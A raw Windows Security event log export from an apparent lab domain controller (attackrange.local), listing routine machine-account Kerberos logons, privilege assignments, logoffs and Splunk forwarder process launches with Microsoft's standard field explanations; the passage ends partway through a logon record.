ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263773
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x75B50A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51502
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:25:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263772
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x75B50A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:26:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263776
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263775
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf50
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263777
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xea8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263778
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1620
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263779
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9a8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263781
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263780
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x868
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263784
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x75EEC2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:26:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263783
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x75EEC2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51519
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:26:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263782
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x75EEC2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:27:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263785
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xab0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263787
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263786
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1374
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263788
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x568
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263789
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1644
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263791
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1988
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263790
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263797
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x761E32
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:27:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263796
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x761E32
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51527
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:27:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263795
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x761E32
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:27:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263794
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x761DC6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:27:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263793
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
